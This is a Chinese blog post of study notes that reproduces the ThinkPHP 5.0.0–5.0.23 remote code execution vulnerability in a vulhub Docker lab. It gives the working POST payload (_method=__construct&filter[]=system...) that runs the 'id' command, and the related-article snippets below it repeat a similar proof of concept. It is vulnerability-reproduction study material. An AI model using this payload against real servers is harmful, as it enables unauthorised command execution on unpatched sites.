ThinkPHP 5.0.23 RCE漏洞学习笔记

最新推荐文章于 2024-03-01 00:46:26 发布
最新推荐文章于 2024-03-01 00:46:26 发布
阅读量1.5k 收藏 1
点赞数
文章标签: html5 html css 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hezhoutheone/article/details/120431907
版权

 影响版本

ThinkPHP版本 5.0.0~5.0.23

漏洞实验环境

靶机:Ubuntu虚拟机

攻击机:Windows10

开启vulhub靶场-打开docker

 cd vulhub/thinkphp/2-rce

docker-compose up -d

 通过docker ps 查看开放端口为8080

 

 通过输入 错误url地址信息得到ThinkPHP版本信息——V 5.0.23

 

 利用网上payload测试,通过hackbar插件直接打post包

url:http://172.18.128.169:8080/index.php?s=captcha

post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

 命令执行成功

 

拾花问酒
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 882
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 991
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
网络安全深入学习第二课——热门框架漏洞RCEThinkphp5.0.23 代码执行)
p36273的博客
09-16 1428
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
vulhub系列之thinkphp(2-rce5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1575
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2424
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
Thinkphp框架漏洞--->5.0.23 RCE
最新发布
huohaowen的博客
03-01 1470
本篇文章来讲一下thinkphp的框架漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP v5.0.23核心版详解》 ThinkPHP,作为一款深受开发者喜爱的PHP框架,自诞生以来,以其简洁、高效的特性在PHP社区中占据了一席之地。尤其是ThinkPHP v5.0系列,它在继承了ThinkPHP框架一贯的优势之外,...
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8240
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3505
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
ThinkPHP历史漏洞
HAKUNAMATATATTA的博客
12-30 5818
Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6157
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1302
Thinkphp漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 426
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
过去一年网络安全的首要威胁是什么?来看看这个报告
jklbnm12的博客
07-13 293
2021年2月,IBM安全团队 X-Force发布了《2021威胁情报指数》,报告显示,漏洞利用成为2020年的首要威胁。 对攻击者来说,寻找和利用网络中未打补丁的问题或常见的漏洞和暴露(CVE)是成功率最高的方法,这也是最常见的获得网络初始访问权的途径。 事实上,漏洞利用的成功率已经超过了钓鱼邮件,在很大程度上取代了凭证窃取,成为攻击者渗透网络的最可靠方法。 现状:新漏洞虽多,但旧漏洞威胁更大 X-Force数据显示,Citrix服务器的目录遍历漏洞(CVE-2019-19871)是2020年被利用最多
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值